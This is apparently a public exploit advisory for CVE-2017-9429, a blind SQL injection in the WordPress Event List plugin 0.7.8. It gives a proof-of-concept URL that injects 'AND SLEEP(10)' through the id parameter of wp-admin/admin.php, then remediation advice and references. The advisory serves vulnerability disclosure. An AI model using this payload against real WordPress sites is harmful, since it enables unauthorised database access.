WordPress Event List 0.7.8 SQL Injection

`# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection  
# Date: 04-06-2017  
# Exploit Author: Dimitrios Tsagkarakis  
# Website: dtsa.eu   
# Software Link: https://wordpress.org/plugins/event-list/  
# Version: 0.7.8  
# CVE : CVE-2017-9429  
# Category: webapps  
  
  
  
1. Description:  
  
  
  
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress  
allows an authenticated user to execute arbitrary SQL commands via the id  
parameter to wp-admin/admin.php.   
  
  
  
2. Proof of Concept:  
  
  
  
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id  
=1 AND SLEEP(10)  
  
  
  
3. Solution:  
  
  
  
The plugin has been removed from WordPress. Deactivate the plug-in and wait  
for a hotfix.  
  
  
  
4. Reference:  
  
  
  
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje  
ction-sqli/  
  
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429  
  
`